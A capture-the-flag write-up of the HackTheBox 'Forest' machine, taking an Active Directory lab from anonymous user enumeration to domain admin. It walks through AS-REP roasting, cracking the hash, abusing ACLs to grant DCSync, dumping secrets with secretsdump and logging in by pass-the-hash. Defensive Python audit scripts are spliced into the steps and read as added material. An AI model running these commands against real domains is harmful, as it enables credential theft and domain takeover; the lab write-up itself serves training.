Forest

Another HackTheBox AD box.

Enumeration:

Port Scanning:

First we will start with nmap to scan for open ports:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.95.210
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-03 04:54 EDT
Nmap scan report for 10.129.95.210
Host is up, received echo-reply ttl 127 (0.23s latency).
Scanned at 2025-09-03 04:54:27 EDT for 108s 
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE      REASON          VERSION
53/tcp    open  domain       syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-03 09:01:45Z)
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?    syn-ack ttl 127
593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack ttl 127
3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack ttl 127
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0 
9389/tcp  open  mc-nmf       syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: mean: 2h26m51s, deviation: 4h02m32s, median: 6m49s

The open ports indicate that we are dealing with an AD domain controller: DNS on port 53, Kerberos on port 88, SMB on port 445, the LDAP ports (389/636/3268/3269), and WinRM on port 5985. The host name of the target machine is FOREST.

I will add the domain and the host name to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ cat /etc/hosts        
127.0.0.1       localhost
127.0.1.1       kali
<snipped>

10.129.95.210 FOREST.htb.local htb.local FOREST

We can see at the bottom of the nmap scan that the clock skew (median 6m49s) is too large for Kerberos, so I will use ntpdate to sync with the target host:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ sudo ntpdate 10.129.95.210

Trying an SMB null session / guest session:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ netexec smb 10.129.95.210 -u '' -p ''                        
SMB         10.129.95.210   445    FOREST           [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) 
SMB         10.129.95.210   445    FOREST           [+] htb.local\:

The Guest account is disabled.

Let's enumerate the users via netexec (other tools such as impacket-lookupsid or rpcclient work as well):

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ netexec smb 10.129.95.210 -u '' -p '' --users                                                                                                                           
SMB         10.129.95.210   445    FOREST           [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)               
SMB         10.129.95.210   445    FOREST           [+] htb.local\:                                                                                                         
SMB         10.129.95.210   445    FOREST           -Username-                    -Last PW Set-       -BadPW- -Description-                                                 
SMB         10.129.95.210   445    FOREST           Administrator                 2021-08-31 00:51:58 0       Built-in account for administering the computer/domain        
SMB         10.129.95.210   445    FOREST           Guest                         <never>             0       Built-in account for guest access to the computer/domain      
SMB         10.129.95.210   445    FOREST           krbtgt                        2019-09-18 10:53:23 0       Key Distribution Center Service Account                       
SMB         10.129.95.210   445    FOREST           DefaultAccount                <never>             0       A user account managed by the system.                         
<snipped>                                                                
SMB         10.129.95.210   445    FOREST           sebastien                     2019-09-20 00:29:59 0                                                                     
SMB         10.129.95.210   445    FOREST           lucinda                       2019-09-20 00:44:13 0                                                                     
SMB         10.129.95.210   445    FOREST           svc-alfresco                  2025-09-03 09:02:02 0                                                                     
SMB         10.129.95.210   445    FOREST           andy                          2019-09-22 22:44:16 0                                                                     
SMB         10.129.95.210   445    FOREST           mark                          2019-09-20 22:57:30 0                                                                     
SMB         10.129.95.210   445    FOREST           santi                         2019-09-20 23:02:55 0                                                                     
SMB         10.129.95.210   445    FOREST           [*] Enumerated 31 local users: HTB

I will add those users to a text file.
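To turn the netexec listing above into the one-username-per-line users.txt that impacket-GetNPUsers reads, here is a small parser (an added example, not part of the original writeup or of netexec itself). The sample output is a constructed excerpt in the same column layout as the real tool output; the file name users.txt is an assumption matching the command used later.

```python
# Added example (not from the original writeup): parse netexec "--users"
# output into a plain username list. The sample text is a constructed
# excerpt in the real column layout: protocol, ip, port, host, payload.

SAMPLE_NETEXEC_OUTPUT = """\
SMB         10.129.95.210   445    FOREST           [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.95.210   445    FOREST           [+] htb.local\\:
SMB         10.129.95.210   445    FOREST           -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.129.95.210   445    FOREST           Administrator                 2021-08-31 00:51:58 0       Built-in account for administering the computer/domain
SMB         10.129.95.210   445    FOREST           Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.129.95.210   445    FOREST           sebastien                     2019-09-20 00:29:59 0
SMB         10.129.95.210   445    FOREST           svc-alfresco                  2025-09-03 09:02:02 0
SMB         10.129.95.210   445    FOREST           [*] Enumerated 31 local users: HTB
"""


def parse_netexec_users(text):
    """Return the usernames from a netexec --users listing, in order, deduplicated."""
    users = []
    for line in text.splitlines():
        parts = line.split(None, 4)  # protocol, ip, port, host, payload
        if len(parts) < 5:
            continue
        payload = parts[4]
        # "[*]"/"[+]" status lines and the table header carry no usernames
        if payload.startswith(("[", "-Username-")):
            continue
        name = payload.split(None, 1)[0]
        if name not in users:
            users.append(name)
    return users


def write_users_file(text, path="users.txt"):
    """Write the parsed usernames to path (assumed name) and return how many were written."""
    users = parse_netexec_users(text)
    with open(path, "w") as fh:
        fh.write("\n".join(users) + "\n")
    return len(users)


if __name__ == "__main__":
    count = write_users_file(SAMPLE_NETEXEC_OUTPUT)
    print(f"wrote {count} usernames to users.txt")
```

Feed it the saved tool output instead of the sample (for example `netexec ... --users | tee nxc-users.txt`) and the resulting file is exactly what the -usersfile option expects.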

AS-REP Roasting:

Now I can try multiple attacks, such as password spraying, using the username as the password, or AS-REP Roasting:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ impacket-GetNPUsers htb.local/ -usersfile users.txt -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
<snipped>
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:e73b60f4b56f1fe0a3f3ac784f529185$3eca9e381a0e88cb8c3a5f89dba8aaa117e36addf8aabaf41721abf9e392fba2ce4d4c75d234022d6f91c19e5b49f99e63dbf74963d696617b8b394167bf22935ecb18738d1399e628c156b3588d6920b38a69d767b5953794c579bad024081b2fd81d8e9b7cf1770e0ca873423c4d656b1f5245915fbbc26b487c1d75854637ce98fdc02cd6fe9497766a5ecd6b0cbf77ce88cb91eaefc01b77be4538e1c4ac213a7b56ccebcffa164c3fe6826bac23084c8a822001d348c153a2e82a9b36489e5c4d1754349dcf8611e74410cc9251931ce3f47744dc52fc2b213e7cea7cce3b2a21290f13
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
<snipped>

Here we can see that the svc-alfresco user has the "Do not require Kerberos preauthentication" option enabled, so the KDC hands out an AS-REP for it without any proof of the password, and that AS-REP can be cracked offline.
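The property GetNPUsers is keying on is a single bit in userAccountControl (UF_DONT_REQUIRE_PREAUTH, 0x400000). The audit below is an added example, not part of the original writeup or of impacket: it decodes that attribute for a constructed set of accounts, separates enabled from disabled exemptions, and shows the value to write back to remediate. The sample account values are constructed; the flag constants and the bitwise-AND LDAP matching rule are the real ones.

```python
# Added example (not part of the original writeup): audit userAccountControl
# for accounts that do not require Kerberos pre-authentication, the setting
# that let impacket-GetNPUsers obtain an AS-REP for svc-alfresco above.
# SAMPLE_ACCOUNTS is constructed; in practice it would come from an LDAP
# query returning sAMAccountName and userAccountControl for every user.

# userAccountControl bit flags (ADS_USER_FLAG_ENUM)
UF_ACCOUNTDISABLE = 0x00000002
UF_PASSWD_NOTREQD = 0x00000020
UF_NORMAL_ACCOUNT = 0x00000200
UF_DONT_EXPIRE_PASSWD = 0x00010000
UF_DONT_REQUIRE_PREAUTH = 0x00400000

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_PASSWD_NOTREQD: "PASSWD_NOTREQD",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}

# LDAP filter that asks the DC for the same thing directly: the bitwise-AND
# matching rule (1.2.840.113556.1.4.803) tests the 0x400000 bit.
LDAP_FILTER_NO_PREAUTH = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))"
)

# Constructed sample: sAMAccountName -> userAccountControl as LDAP returns it
SAMPLE_ACCOUNTS = {
    "Administrator": 66048,   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    "Guest": 66082,           # ... | PASSWD_NOTREQD | ACCOUNTDISABLE
    "svc-alfresco": 4260352,  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQUIRE_PREAUTH
    "andy": 512,              # NORMAL_ACCOUNT
    "old-svc": 4194818,       # NORMAL_ACCOUNT | DONT_REQUIRE_PREAUTH | ACCOUNTDISABLE
}


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value."""
    return {name for bit, name in FLAG_NAMES.items() if value & bit}


def asrep_roastable(accounts):
    """Split accounts with DONT_REQUIRE_PREAUTH into (enabled, disabled).

    Only enabled accounts yield a crackable AS-REP, but the flag on a
    disabled account is still a misconfiguration to clean up before the
    account is ever re-enabled.
    """
    enabled, disabled = [], []
    for name, uac in accounts.items():
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        (disabled if uac & UF_ACCOUNTDISABLE else enabled).append(name)
    return sorted(enabled), sorted(disabled)


def remediated_uac(uac):
    """The userAccountControl value to write back to remove the exemption."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH


if __name__ == "__main__":
    print("LDAP filter:", LDAP_FILTER_NO_PREAUTH)
    enabled, disabled = asrep_roastable(SAMPLE_ACCOUNTS)
    for name in enabled:
        uac = SAMPLE_ACCOUNTS[name]
        print(f"{name}: {sorted(decode_uac(uac))} -> set userAccountControl to {remediated_uac(uac)}")
    for name in disabled:
        print(f"{name}: flag set but account disabled")
```

Clearing the bit is the fix; if an application genuinely cannot do pre-authentication, the fallback is a long random password, since the AS-REP is only as strong as the password hashcat has to guess.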

Let's save this AS-REP hash to a file and attempt to crack it with hashcat:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ hashcat svc-alfresco.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting in autodetect mode

<snipped>

$krb5asrep$23$svc-alfresco@HTB.LOCAL:e73b60f4b56f1fe0a3f3ac784f529185$3eca9e381a0e88cb8c3a5f89dba8aaa117e36addf8aabaf41721abf9e392fba2ce4d4c75d234022d6f91c19e5b49f99e63dbf74963d696617b8b394167bf22935ecb18738d1399e628c156b3588d6920b38a69d767b5953794c579bad024081b2fd81d8e9b7cf1770e0ca873423c4d656b1f5245915fbbc26b487c1d75854637ce98fdc02cd6fe9497766a5ecd6b0cbf77ce88cb91eaefc01b77be4538e1c4ac213a7b56ccebcffa164c3fe6826bac23084c8a822001d348c153a2e82a9b36489e5c4d1754349dcf8611e74410cc9251931ce3f47744dc52fc2b213e7cea7cce3b2a21290f13:s3rvice
                                                           
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:e73b60f4b56f1f...290f13
Time.Started.....: Wed Sep  3 05:00:17 2025 (3 secs)
Time.Estimated...: Wed Sep  3 05:00:20 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1314.7 kH/s (0.86ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4082688/14344385 (28.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: s6509511 -> s3r3ndipit
Hardware.Mon.#1..: Util: 27%

<snipped>

Now we have valid domain user credentials: htb.local/svc-alfresco:s3rvice.

BloodHound:

There are no interesting shares or user descriptions, so this time I will use netexec as the BloodHound ingestor to collect the domain data:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ netexec ldap 10.129.95.210 -u svc-alfresco -p s3rvice --bloodhound -c all --dns-server 10.129.95.210
LDAP        10.129.95.210   389    FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice 
LDAP        10.129.95.210   389    FOREST           Resolved collection methods: psremote, dcom, localadmin, session, container, acl, rdp, objectprops, trusts, group
LDAP        10.129.95.210   389    FOREST           Done in 01M 01S
LDAP        10.129.95.210   389    FOREST           Compressing output into /home/kali/.nxc/logs/FOREST_10.129.95.210_2025-09-03_060617_bloodhound.zip

Then I will open up BloodHound:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ sudo bloodhound                                                                                                                                                         
[sudo] password for kali:                                                                                                                                                   
                                                                                                                                                                            
 Starting neo4j                                                                                                                                                             
Neo4j is not running.                                                                                                                                                       
Directories in use:                                                                                                                                                         
home:         /usr/share/neo4j                                                                                                                                              
config:       /usr/share/neo4j/conf                                                                                                                                         
logs:         /etc/neo4j/logs                                                                                                                                               
plugins:      /usr/share/neo4j/plugins                                                                                                                                      
import:       /usr/share/neo4j/import                                                                                                                                       
data:         /etc/neo4j/data                                                                                                                                               
certificates: /usr/share/neo4j/certificates                                                                                                                                 
licenses:     /usr/share/neo4j/licenses                                                                                                                                     
run:          /var/lib/neo4j/run                                                                                                                                            
Starting Neo4j.                                                                                                                                                             
Started neo4j (pid:106093). It is available at http://localhost:7474                                                                                                        
There may be a short delay until the server is ready.                                                                                                                       
................................................                                                                                                                            
 Bloodhound will start                                                                                                                                                      
                                                                                                                                                                            
 IMPORTANT: It will take time, please wait...
 
 <snipped>
 
 opening http://127.0.0.1:8080

I will unzip the collected .zip file and upload the ingested data to BloodHound:

Then mark svc-alfresco as owned:

Privilege Escalation:

I will navigate to the Cypher tab and try some queries to find interesting attack paths.

We will find that svc-alfresco is a member of Remote Management Users, which means we can WinRM to the target machine and read the user flag.

Abuse ACLs:

I clicked on shortest paths from owned objects, and saw this:

We can see that we are a member of the Account Operators group, and interestingly the Account Operators group has GenericAll over multiple objects in the domain, including the Exchange Windows Permissions group:

That group in turn has WriteDacl over the domain object, so if I add svc-alfresco to it, I can grant him DCSync rights.

I will add svc-alfresco to that group using the command provided by BloodHound itself:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ net rpc group addmem "Exchange Windows Permissions" "svc-alfresco" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "forest.htb.local"

Check if the user has been added:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ net rpc group members "Exchange Windows Permissions" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "forest.htb.local"              
HTB\Exchange Trusted Subsystem
HTB\svc-alfresco

We can see that we are a member of that group; now let's grant ourselves DCSync rights using impacket-dacledit:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ impacket-dacledit -action 'write' -rights 'DCSync' -principal 'svc-alfresco' -target-dn 'DC=htb,DC=local' 'htb.local'/'svc-alfresco':'s3rvice'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250903-061628.bak
[*] DACL modified successfully!
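What dacledit just wrote is a pair of object ACEs on DC=htb,DC=local granting the two replication control-access rights. The script below is an added example, not part of the original writeup or of impacket: it walks a (constructed) ACE list for the domain object, reports every trustee holding both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, flags those outside an expected baseline, and separately lists who holds WriteDacl, since that is the right that made the grant possible here. The extended-right GUIDs and access-mask bits are the real ones; the ACE list and the baseline set are assumptions to adjust per environment.

```python
# Added example (not part of the original writeup): audit the domain
# object's DACL for DCSync-capable principals and for WriteDacl holders.
# SAMPLE_ACES is constructed; in practice the ACEs come from parsing the
# nTSecurityDescriptor of the domain object (e.g. with impacket's ldaptypes).

# Control-access right GUIDs from the AD schema's extended rights
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"

# Access-mask bits
ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100
ADS_RIGHT_WRITE_DAC = 0x00040000
ADS_RIGHT_GENERIC_ALL = 0x10000000

# Principals expected to replicate (assumption: set per environment baseline)
EXPECTED_REPLICATORS = {
    "BUILTIN\\Administrators",
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
    "HTB\\Domain Controllers",
}


def _ace(trustee, mask, object_type=None, ace_type="ALLOW"):
    return {"trustee": trustee, "type": ace_type, "mask": mask, "object_type": object_type}


# Constructed sample DACL for DC=htb,DC=local after the dacledit run above
SAMPLE_ACES = [
    _ace("BUILTIN\\Administrators", ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    _ace("BUILTIN\\Administrators", ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
    _ace("HTB\\Domain Controllers", ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    _ace("HTB\\Domain Controllers", ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
    _ace("HTB\\Enterprise Read-only Domain Controllers", ADS_RIGHT_DS_CONTROL_ACCESS,
         DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET),
    _ace("HTB\\Exchange Windows Permissions", ADS_RIGHT_WRITE_DAC),
    _ace("HTB\\Guest", ADS_RIGHT_DS_CONTROL_ACCESS, ace_type="DENY"),   # deny ACE: never a grant
    _ace("HTB\\svc-alfresco", ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    _ace("HTB\\svc-alfresco", ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
]


def ace_grants(ace, right_guid):
    """True if this ACE grants the given control-access right."""
    if ace["type"] != "ALLOW":
        return False
    if not ace["mask"] & (ADS_RIGHT_DS_CONTROL_ACCESS | ADS_RIGHT_GENERIC_ALL):
        return False
    # An object ACE is scoped to one right; a plain ACE covers all extended rights
    return ace["object_type"] is None or ace["object_type"].lower() == right_guid


def dcsync_capable(aces):
    """Trustees holding both Get-Changes and Get-Changes-All (enough to DCSync)."""
    held = {}
    for ace in aces:
        rights = held.setdefault(ace["trustee"], set())
        for guid in (DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL,
                     DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET):
            if ace_grants(ace, guid):
                rights.add(guid)
    return sorted(t for t, r in held.items()
                  if {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL} <= r)


def unexpected_dcsync(aces, baseline=EXPECTED_REPLICATORS):
    """DCSync-capable trustees that are not in the expected baseline."""
    return [t for t in dcsync_capable(aces) if t not in baseline]


def write_dacl_holders(aces):
    """Trustees who can rewrite the DACL itself (and so grant DCSync to anyone)."""
    return sorted({a["trustee"] for a in aces
                   if a["type"] == "ALLOW" and a["object_type"] is None
                   and a["mask"] & (ADS_RIGHT_WRITE_DAC | ADS_RIGHT_GENERIC_ALL)})


if __name__ == "__main__":
    print("DCSync capable:", dcsync_capable(SAMPLE_ACES))
    print("Unexpected:", unexpected_dcsync(SAMPLE_ACES))
    print("WriteDacl holders:", write_dacl_holders(SAMPLE_ACES))
```

Run against a real DACL this is the check that surfaces a grant like the one above; the dacledit-*.bak file the tool wrote is also the cleanest way to restore the original descriptor afterwards, and a WriteDacl holder outside the admin tier is the finding to fix first, because it makes every other ACE on the object provisional.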

And now with secretsdump we can perform the DCSync (Domain Controller Synchronization) attack:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ impacket-secretsdump htb.local/svc-alfresco:s3rvice@forest.htb.local                                                                           
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb****************:::
<snipped>
[*] Cleaning up...

Here we have the NTLM hash of the domain administrator; let's authenticate via WinRM:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ evil-winrm -i 10.129.95.210 -u administrator -H 32693b11e6aa90eb****************
                                         
Evil-WinRM shell v3.7
                                         
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                         
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                         
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
FOREST
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb 
   IPv6 Address. . . . . . . . . . . : dead:beef::ccde:52fe:5f28:8ca7
   Link-local IPv6 Address . . . . . : fe80::ccde:52fe:5f28:8ca7%5
   IPv4 Address. . . . . . . . . . . : 10.129.95.210
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%5
                                       10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

From here we can also read both flags:

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\svc-alfresco\Desktop\user.txt
37338043b3f16983****************
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
39d59bca6dc4090c****************
